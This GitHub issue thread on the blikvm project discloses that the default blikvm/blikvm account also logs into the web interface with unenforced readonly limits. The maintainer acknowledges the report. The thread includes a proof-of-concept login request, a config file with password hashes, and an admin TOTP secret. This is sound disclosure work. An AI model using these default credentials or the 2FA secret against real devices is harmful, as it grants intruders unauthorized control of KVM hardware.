blikvm/blikvm #308: blikvm v2.0.5-alpha has an Weak password

qfzwysec, 2025-08-27:
A weak password vulnerability was discovered in blikvm v2.0.5-alpha. 
The official documentation only mentions the account: blikvm, password: blikvm, for SSH login, but in fact, this account can also be used to log in to the web. 
[image]
Although the configuration file sets its role as readonly, the system does not impose permission restrictions on the role. The only permission restriction is on user creation, but it can still be bypassed. This will be mentioned in the next issue.
filepath:web_src/web_server/config/user.json
`{
  "version": 2,
  "Roles": [
    {
      "role": "admin",
      "description": "full access"
    },
    {
      "role": "readonly",
      "description": "limited access"
    }
  ],
  "Accounts": [
    {
      "username": "admin",
      "password": "$2b$10$iB3xpN8gl/iXusff8d3xCeRJu5M1s71RFgSveZTKuBymerQREUIja",
      "role": "admin",
      "isEnabled": true,
      "isTwoFaEnabled": false,
      "twoFaSecret": "CN6TP5DCSQRXB4J477RVSWUB3X5WKMBN",
      "twoFaUri": "otpauth://totp/BliKVM%3Aadmin?secret=CN6TP5DCSQRXB4J477RVSWUB3X5WKMBN&issuer=BliKVM"
    },
    {
      "username": "blikvm",
      "password": "$2b$10$.3cX/1cVKwgTxERqaYpdL.VVE0ippbiAUFtMJLA77vEcAGuuwgmBS",
      "role": "readonly",
      "isEnabled": true,
      "isTwoFaEnabled": false,
      "twoFaSecret": "",
      "twoFaUri": ""
    }
  ]
}`

poc:
`POST /api/login HTTP/1.1
Host: xxx
Content-Length: 48
Sec-Ch-Ua-Platform: xxx
User-Agent: xxx
Accept: application/json, text/plain, */*
Sec-Ch-Ua: xxx
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
Origin: xxx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: xxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=1, i
Connection: close

{"username":"blikvm","password":"blikvm","twoFaCode":null}`

blikvm, 2025-08-27:
Thank you very much for carefully reviewing the code. There are indeed vulnerabilities in this area, and I will take them seriously and fix them in future versions.
By the way, are you Chinese? If so, I think we can add a WeChat account for easier communication.

qfzwysec, 2025-08-27:
Yes, I'm Chinese. You can leave your WeChat ID. I'll contact you.

---- Replied Message ----
| From | ***@***.***> |
| Date | 08/27/2025 21:25 |
| To | ***@***.***> |
| Cc | ***@***.***>***@***.***> |
| Subject | Re: [blikvm/blikvm] blikvm v2.0.5-alpha has a weak password vulnerability (Issue #308) |
blikvm left a comment (blikvm/blikvm#308)

Thank you very much for carefully reviewing the code. There are indeed vulnerabilities in this area, and I will take them seriously and fix them in future versions.
By the way, are you Chinese? If so, I think we can add a WeChat account for easier communication.

closed 2025-09-18 by blikvm